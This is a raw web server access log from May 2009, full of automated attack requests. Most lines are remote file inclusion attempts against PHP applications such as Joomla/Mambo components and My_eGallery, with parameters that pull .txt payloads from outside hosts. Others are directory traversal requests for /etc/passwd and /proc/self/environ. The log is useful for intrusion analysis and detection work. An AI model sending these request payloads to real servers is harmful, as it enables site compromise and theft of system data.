216.119.103.12 - - [26/May/2009:11:37:50 -0500] "GET /logs/access_log.1241654400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:37:54 -0500] "GET /logs/access_log.1236384000//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:38:00 -0500] "GET /logs/access_log.1239321600//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:38:05 -0500] "GET /logs/access_log.1233187200//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:38:05 -0500] "GET /logs/access_log.1239494400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:38:05 -0500] "GET /logs/access_log.1242172800//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
216.119.103.12 - - [26/May/2009:11:38:05 -0500] "GET /logs/access_log.1242518400//admin/spaw/spaw_control.class.php?spaw_root=http://www.magicmountainfilms.com/ainul/AinuLid1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:11:42:40 -0500] "GET /logs/access_log.1234396800/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:11:42:40 -0500] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:11:42:40 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:11:42:40 -0500] "GET /logs/access_log.1233532800/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.12 - - [26/May/2009:11:46:24 -0500] "GET /program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 341 "-""libwww-perl/5.805"
77.221.130.12 - - [26/May/2009:11:46:24 -0500] "GET /logs/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
218.185.20.88 - - [26/May/2009:11:52:22 -0500] "GET /?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:52:22 -0500] "GET /logs/access_log.1236124800/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:52:22 -0500] "GET /logs/access_log.1236470400/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:52:25 -0500] "GET /logs/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:53:51 -0500] "GET /logs/access_log.1236124800/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:53:51 -0500] "GET /?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:53:51 -0500] "GET /logs/access_log.1236470400/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:11:53:53 -0500] "GET /logs/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
208.113.239.72 - - [26/May/2009:11:53:57 -0500] "GET /logs/dbase.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 297 "-""libwww-perl/5.803"
208.113.239.72 - - [26/May/2009:11:53:57 -0500] "GET /dbase.php?action=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 292 "-""libwww-perl/5.803"
83.143.81.26 - - [26/May/2009:11:54:27 -0500] "GET /logs/access_log.1242172800//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:11:54:27 -0500] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:11:54:27 -0500] "GET //components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:11:54:27 -0500] "GET /logs/access_log.1242518400//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:11:55:34 -0500] "GET /logs/access_log.1242000000//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:12:01:40 -0500] "GET /logs/access_log.1230681600//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:12:01:40 -0500] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:12:01:40 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
83.143.81.26 - - [26/May/2009:12:01:45 -0500] "GET /logs/access_log.1238889600//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:12:03:35 -0500] "GET /logs/access_log.1238112000//modules/agendax/addevent.inc.php?agendax_path=http://tulokera.com/home/copyright.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:12:03:35 -0500] "GET //modules/agendax/addevent.inc.php?agendax_path=http://tulokera.com/home/copyright.txt? HTTP/1.1" 404 316 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:12:03:35 -0500] "GET /logs/access_log.1239667200//modules/agendax/addevent.inc.php?agendax_path=http://tulokera.com/home/copyright.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
58.227.193.198 - - [26/May/2009:12:03:35 -0500] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://tulokera.com/home/copyright.txt? HTTP/1.1" 404 321 "-""Mozilla/5.0"
86.39.131.85 - - [26/May/2009:12:04:08 -0500] "GET /modules/My_eGallery/index.php?basepath=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
86.39.131.85 - - [26/May/2009:12:04:08 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
218.185.20.88 - - [26/May/2009:12:04:48 -0500] "GET /?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:04:51 -0500] "GET /logs/access_log.1236124800/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:04:51 -0500] "GET /logs/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:04:52 -0500] "GET /?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:04:55 -0500] "GET /logs/access_log.1236470400/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:12:04:58 -0500] "GET /logs/access_log.1236124800/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:12:04:59 -0500] "GET /logs/access_log.1236470400/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
218.185.20.88 - - [26/May/2009:12:05:01 -0500] "GET /logs/?_zbpath=http://www.kq-china.com/web//plugins/system/id1.txt??? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:06:38 -0500] "GET /logs/access_log.1236124800/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:06:39 -0500] "GET /?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:06:39 -0500] "GET /logs/access_log.1236470400/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:06:40 -0500] "GET /logs/?_zbpath=http://www.omsklyvr.omit.ru/id1.txt? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:07:11 -0500] "GET /logs//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:07:11 -0500] "GET //components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:07:12 -0500] "GET /logs/access_log.1242172800//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:07:14 -0500] "GET /logs/access_log.1242518400//components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 365 "-""Mozilla/5.0"
86.39.131.85 - - [26/May/2009:12:08:00 -0500] "GET /logs//squirrelcart/cart_content.php?cart_isp_root=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
86.39.131.85 - - [26/May/2009:12:08:00 -0500] "GET //squirrelcart/cart_content.php?cart_isp_root=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
86.39.131.85 - - [26/May/2009:12:08:41 -0500] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 329 "-""libwww-perl/5.79"
86.39.131.85 - - [26/May/2009:12:08:41 -0500] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://motorcrew.co.kr/home/img/kernel/lib/s/id8.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
69.55.50.243 - - [26/May/2009:12:14:59 -0500] "GET /logs/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cyberpron.org/krs/id.txt???? HTTP/1.1" 404 297 "-""libwww-perl/5.819"
69.55.50.243 - - [26/May/2009:12:14:59 -0500] "GET /index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=http://cyberpron.org/krs/id.txt???? HTTP/1.1" 404 292 "-""libwww-perl/5.819"
85.17.162.28 - - [26/May/2009:12:23:52 -0500] "GET //modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:23:52 -0500] "GET /logs//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:23:52 -0500] "GET /logs/access_log.1230681600//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:23:56 -0500] "GET //citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:23:56 -0500] "GET /logs//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:23:58 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
85.17.162.28 - - [26/May/2009:12:23:58 -0500] "GET /logs/access_log.1238889600//modules/My_eGallery/public/displayCategory.php?adminpath=http://bill88.ca/93Documents/Trust?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:24:01 -0500] "GET //citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 303 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:24:02 -0500] "GET /logs//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 308 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:24:03 -0500] "GET /logs/access_log.1241654400//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:24:41 -0500] "GET /logs/access_log.1242518400//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:25:09 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:25:09 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:25:09 -0500] "GET /logs/access_log.1237939200//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:25:18 -0500] "GET /logs/access_log.1239494400//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:25:52 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:10 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:10 -0500] "GET //ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:11 -0500] "GET //ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 295 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:11 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 300 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:11 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:11 -0500] "GET /logs/access_log.1241740800//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:16 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:27:17 -0500] "GET /logs/access_log.1242086400//ashnews.php?pathtoashnews=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 322 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:28:18 -0500] "GET /logs/access_log.1242518400//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
77.221.130.12 - - [26/May/2009:12:28:21 -0500] "GET /logs/lib.module.php?mod_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 302 "-""libwww-perl/5.805"
77.221.130.12 - - [26/May/2009:12:28:21 -0500] "GET /lib.module.php?mod_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 297 "-""libwww-perl/5.805"
60.29.28.2 - - [26/May/2009:12:29:24 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:29:24 -0500] "GET /logs/access_log.1236038400//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:29:25 -0500] "GET //config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
207.182.143.50 - - [26/May/2009:12:29:48 -0500] "GET /logs/access_log.1240444800//citywriter/head.php?path=http://www.dynamicformation.com//administrator/components/com_virtuemart/classes/export/mawar.txt????? HTTP/1.1" 404 330 "-""Mozilla/5.0"
60.29.28.2 - - [26/May/2009:12:30:44 -0500] "GET /logs/access_log.1239062400//config/dbutil.bck.php?confdir=http://poisonx.ucoz.com/braid.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
69.55.50.243 - - [26/May/2009:12:36:51 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://cyberpron.org/krs/id.txt???? HTTP/1.1" 404 339 "-""libwww-perl/5.819"
69.55.50.243 - - [26/May/2009:12:36:51 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://cyberpron.org/krs/id.txt???? HTTP/1.1" 404 334 "-""libwww-perl/5.819"
77.221.159.43 - - [26/May/2009:12:39:23 -0500] "GET /?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:23 -0500] "GET /logs/access_log.1238457600/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:24 -0500] "GET /?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:24 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:25 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:26 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:27 -0500] "GET /logs/access_log.1239926400/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:39:33 -0500] "GET /logs/access_log.1237593600/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:40:49 -0500] "GET /?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:40:49 -0500] "GET /logs/access_log.1242172800/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:40:50 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:41:34 -0500] "GET /?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:41:34 -0500] "GET /logs/access_log.1242172800/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:41:35 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 200 190841 "-""Mozilla/5.0"
77.221.159.43 - - [26/May/2009:12:41:45 -0500] "GET /logs/access_log.1242086400/?DOCUMENT_ROOT=http://www.triton-friendlyclub.com/2009/v5id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
78.143.46.120 - - [26/May/2009:12:50:41 -0500] "GET //include/write.php?dir=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
78.143.46.120 - - [26/May/2009:12:50:41 -0500] "GET /logs/access_log.1230422400//include/write.php?dir=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
78.143.46.120 - - [26/May/2009:12:50:41 -0500] "GET /logs//include/write.php?dir=http://reklama-gorod.ru//assets/export/fx29id.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:12:54:18 -0500] "GET /logs/access_log.1238112000/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:12:54:18 -0500] "GET /modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
211.203.180.144 - - [26/May/2009:12:54:18 -0500] "GET /logs/modules/My_eGallery/index.php?basepath=http://shanghaisisa.com/skin/id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:12:54:29 -0500] "GET /logs/access_log.1242172800/index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:12:54:29 -0500] "GET /logs/access_log.1240876800/index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 319 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:12:54:29 -0500] "GET /index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 292 "-""Mozilla/5.0"
213.246.62.35 - - [26/May/2009:12:54:32 -0500] "GET /logs/index.php?visualizar=http://jamur.3dn.ru/id1.txt???? HTTP/1.1" 404 297 "-""Mozilla/5.0"
68.169.45.48 - - [26/May/2009:12:57:00 -0500] "GET /logs/errors.php?error=?? HTTP/1.1" 404 298 "-""libwww-perl/5.823"
68.169.45.48 - - [26/May/2009:12:57:01 -0500] "GET /errors.php?error=?? HTTP/1.1" 404 293 "-""libwww-perl/5.823"
220.181.7.97 - - [26/May/2009:13:08:52 -0500] "GET / HTTP/1.1" 200 3245 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
64.191.102.117 - - [26/May/2009:13:09:35 -0500] "GET /logs/access_log.1239408000//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
64.191.102.117 - - [26/May/2009:13:09:35 -0500] "GET //components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
64.191.102.117 - - [26/May/2009:13:09:36 -0500] "GET /logs//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 336 "-""Mozilla/5.0"
65.55.208.139 - - [26/May/2009:13:09:43 -0500] "GET /logs/access_log.1229990400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
64.191.102.117 - - [26/May/2009:13:09:44 -0500] "GET /logs/access_log.1242086400//components/com_virtuemart/virtuemart_parser.php?mosConfig_absolute_path=http://billardshow.de/images/id.txt??? HTTP/1.1" 404 358 "-""Mozilla/5.0"
